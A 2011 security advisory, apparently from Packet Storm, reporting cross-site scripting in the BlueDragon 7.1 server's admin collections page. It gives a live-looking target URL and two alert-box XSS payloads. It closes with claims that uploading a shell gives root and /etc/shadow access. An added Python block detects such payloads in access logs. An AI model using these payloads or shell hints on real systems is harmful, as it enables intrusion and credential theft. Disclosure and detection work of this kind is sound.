BlueDragon 7.1 Cross Site Scripting

2011-09-01T00:00:00
ID PACKETSTORM:104698
Type packetstorm
Reporter SubhashDasyam
Modified 2011-09-01T00:00:00

Description

# Exploit Title: BlueDragon 7.1 Enterprise Server JX Multiple XSS Vulnerabilities  
# Google Dork:  
# Cost : 5999$  
# Date: 01/08/2011  
# Author: www.newatlanta.com/bluedragon/  
# Software Link: www.newatlanta.com/bluedragon/  
# Version: 7.1  
# Tested on: Windows 7 , Ubuntu 11  
# CVE :  
# Exploit Discovered : SubhashDasyam  
# Website : http://www.subhashdasyam.com  
  
http://scotspine.viviotech.net:8080/bluedragon/admin/collections.cfm  
In the Name of Collections field, enter an XSS string like:  
  
<BODY ONLOAD=alert('XSS')>  
"><< <script>alert('XSS');</script>">  
  
Demo Screen Shot  
http://i54.tinypic.com/k2ec05.png  
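
As an added example (not part of the original advisory), the following Python checks a web-server access log for requests to the admin collections page whose parameters carry tag or event-handler injection like the strings above, URL-decoding them first. It assumes a CLF-style access log and that the collection name arrives as a query parameter named `name`; the page does not give the form field name, and a POST body would need application-level logging instead.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed sample log: one benign request, the two payloads from the
# advisory URL-encoded as a browser would submit them, and an unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2011:10:00:01 +0000] "GET /bluedragon/admin/collections.cfm?name=docs HTTP/1.1" 200 512
10.0.0.5 - - [01/Aug/2011:10:00:07 +0000] "GET /bluedragon/admin/collections.cfm?name=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E HTTP/1.1" 200 512
10.0.0.5 - - [01/Aug/2011:10:00:12 +0000] "GET /bluedragon/admin/collections.cfm?name=%22%3E%3C%3C+%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%22%3E HTTP/1.1" 200 512
10.0.0.9 - - [01/Aug/2011:10:01:00 +0000] "GET /index.cfm HTTP/1.1" 200 2048
"""

# Request line inside a CLF-style access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
ADMIN_PATH = "/bluedragon/admin/collections.cfm"  # page named in the advisory
# Heuristic for HTML injection: an opening/closing tag or an on*= event handler.
# Matches both advisory payloads; expect some noise (e.g. a parameter "once=").
XSS_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)


def suspicious_requests(log_text: str) -> list:
    """Return one dict per parameter value that looks like an XSS probe
    against the admin collections page: {param, value, line}."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if url.path != ADMIN_PATH:
            continue
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:
                # parse_qs decoded once; a second pass catches double-encoded probes.
                decoded = unquote_plus(value)
                if XSS_RE.search(decoded):
                    hits.append({"param": param, "value": decoded, "line": line})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['param']}={hit['value']!r}")
```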
  
This enterprise server costs you $5999 per license, yet there is still no security.  
  
You get root access to the server if you upload a shell.  
  
One can access the shadow file, e.g. /etc/shadow.  